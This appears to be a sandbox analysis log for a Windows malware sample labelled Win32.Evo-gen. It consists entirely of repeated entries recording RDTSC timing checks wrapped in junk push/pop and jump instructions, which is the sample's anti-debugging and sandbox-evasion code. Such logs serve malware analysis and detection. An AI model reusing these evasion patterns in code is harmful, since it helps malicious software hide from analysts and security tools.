Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107705D second address: 1077085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F449CC63D7Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F449CC63D81h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1077085 second address: 107708B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107708B second address: 10770A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F449CC63D82h 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10770A5 second address: 10770AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F449CEB0736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107722B second address: 1077231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1077231 second address: 1077239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1077239 second address: 1077264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F449CC63D81h 0x0000000d jmp 00007F449CC63D82h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1077264 second address: 107726A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107726A second address: 1077277 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1077277 second address: 107727D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107739F second address: 10773AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F449CC63D78h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1077E97 second address: 1077EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F449CEB0736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107AE8D second address: 107AEA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D82h 0x00000007 jnl 00007F449CC63D76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107FE39 second address: 107FE50 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F449CEB073Ch 0x00000008 je 00007F449CEB0736h 0x0000000e push eax 0x0000000f jne 00007F449CEB0736h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107F1A7 second address: 107F1B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107F4A9 second address: 107F4BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107F4BC second address: 107F4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107F4C7 second address: 107F4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107F881 second address: 107F885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10861EC second address: 10861F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10861F0 second address: 108620C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F449CC63D86h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 108620C second address: 1086211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1086502 second address: 1086508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1086B0A second address: 1086B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1087067 second address: 108708B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F449CC63D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F449CC63D84h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 108708B second address: 1087091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1087091 second address: 108709B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1090CC3 second address: 1090CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 108FE62 second address: 108FE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D80h 0x00000009 jmp 00007F449CC63D89h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1090424 second address: 109042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 109042A second address: 109044B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 jmp 00007F449CC63D7Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 109044B second address: 109044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 109044F second address: 1090453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1090A03 second address: 1090A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1090A07 second address: 1090A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1096EC8 second address: 1096ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1097041 second address: 109705F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F449CC63D76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jmp 00007F449CC63D7Eh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10975DF second address: 10975E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10975E5 second address: 1097605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F449CC63D78h 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F449CC63D76h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1097605 second address: 1097609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1097755 second address: 109775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 109775A second address: 109775F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1097B9F second address: 1097BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1097BA5 second address: 1097BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1097BAA second address: 1097BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1098C8B second address: 1098C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10A1428 second address: 10A142C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10A1592 second address: 10A1596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10A1773 second address: 10A177D instructions: 0x00000000 rdtsc 0x00000002 js 00007F449CC63D7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10AE2AB second address: 10AE2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F449CEB0736h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10AE2BD second address: 10AE2C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10AE2C1 second address: 10AE2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F449CEB073Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10AE011 second address: 10AE034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D7Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F449CC63D7Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10AE034 second address: 10AE04B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F449CEB0742h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10B107A second address: 10B107E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10B107E second address: 10B108A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10B4FA5 second address: 10B4FC1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CC63D7Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10B517E second address: 10B519B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F449CEB0741h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10B519B second address: 10B51AA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F449CC63D76h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10BDB52 second address: 10BDB69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10BDB69 second address: 10BDB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10BDB6D second address: 10BDB79 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F449CEB0736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10C63C8 second address: 10C63D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F449CC63D76h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10C63D6 second address: 10C63DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10C903C second address: 10C9056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10C9056 second address: 10C905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10CB76E second address: 10CB773 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10CB773 second address: 10CB779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10CE98C second address: 10CE9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F449CC63D88h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10CE9AB second address: 10CE9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D5B45 second address: 10D5B5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F449CC63D76h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F449CC63D76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D5B5B second address: 10D5B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D45B9 second address: 10D45BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D45BD second address: 10D45C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D45C3 second address: 10D45C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D4868 second address: 10D487E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F449CEB073Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D487E second address: 10D4882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D4882 second address: 10D48A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F449CEB0748h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D4A05 second address: 10D4A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F449CC63D76h 0x0000000b jmp 00007F449CC63D7Dh 0x00000010 jmp 00007F449CC63D88h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D4A37 second address: 10D4A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D4A41 second address: 10D4A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D4BAB second address: 10D4BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F449CEB0746h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D4BC6 second address: 10D4BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F449CC63D76h 0x00000009 jmp 00007F449CC63D7Fh 0x0000000e jp 00007F449CC63D76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D4D27 second address: 10D4D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D8A4E second address: 10D8A7D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D7Eh 0x00000008 jmp 00007F449CC63D7Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F449CC63D78h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D8A7D second address: 10D8A87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D8A87 second address: 10D8A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D8A8C second address: 10D8A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10D8638 second address: 10D863E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
